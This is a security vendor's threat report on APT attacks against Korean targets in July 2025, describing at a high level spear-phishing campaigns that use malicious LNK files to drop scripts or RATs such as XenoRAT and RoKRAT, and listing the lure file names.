July 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab has been using AhnLab Smart Defense (ASD) to monitor advanced persistent threat (APT) attacks against targets in Korea. This report will cover the types and statistics of APT attacks in Korea during July 2025 as well as features for each type.
Figure 1. July 2025 statistics on APT attacks in Korea
Most APT attacks identified in Korea were spread through spear phishing. In particular, in July 2025, attacks using LNK files within spear phishing campaigns accounted for the largest proportion. Additionally, watering hole attacks have been observed, where code exploiting specific product vulnerabilities is inserted into web pages.
Trends of APT Attacks in Korea
The cases and features for each APT attack type identified in July 2025 are as follows.
1) Spear Phishing
Spear phishing is a type of phishing attack against specific individuals or groups. Unlike ordinary phishing attacks, the threat actor conducts reconnaissance before launching the attacks to collect information on and learn about the attack targets. Because the threat actor crafts phishing emails using the collected information, the recipients of the emails are highly likely to believe that they are from a trusted source. There are also cases where the sender’s address is manipulated through email spoofing. Most spear phishing attacks include malicious attachments or links that are intended to lure the user to open them.
Types distributed using this technique are as follows.
1.1 Attacks Using LNK Files
Type A
This type involves creating a compressed CAB file containing multiple malicious scripts to exfiltrate information and download additional malware. The distributed LNK file contains a malicious PowerShell command, which is used to extract the data of the CAB file and decoy document inside the LNK file, creating them on the user’s PC. The CAB file is then decompressed, and multiple script files (bat, ps1, vbs, etc.) included inside are executed. The executed script files can perform malicious behaviors such as exfiltrating information from the user’s PC and downloading additional files.
The confirmed file name is as follows.
|
File Name |
| Notice on Submission of Explanation for Unreported Source of Funds.hwp.lnk |
| Attachment1.VentureInvestmentCertificate(Form).hwp.lnk |
| KoreaBlockchainAssociation_Expert Opinion Survey for Improving Blockchain and Digital Asset Regulations.docx.lnk |
| 1. Overseas Financial Account Report.hwp.lnk |
Table 1. Confirmed file names
Type B
This type executes RAT malware. It is mainly distributed in a compressed file format along with legitimate files. The distributed LNK file contains a malicious PowerShell command. The malware uses the Dropbox API or Google Drive to download additional scripts and obfuscated RAT malware to the user’s PC (e.g. %PUBLIC%). The executed RAT malware performs various malicious behaviors according to the threat actor’s commands, such as keylogging and taking screenshots. The identified RAT types include XenoRAT and RoKRAT.
The confirmed file name is as follows.
|
File Name |
| (Monthly kima) 3-1 ai War Situation Ideal Battlefield Leadership Development Direction (Final).lnk |
| Week 3 of July 2025 International Security and Military Defense Situation (Vol. 363).lnk |
| [Submission and Field Investigation Guide].lnk |
| Research on the Political Control Failure of the National Intelligence Service |
| Operation of Academy for the Successful Settlement of North Korean Defectors in South Korea.lnk |
Table 2. Identified file names
※ For more information, please refer to the attached file.
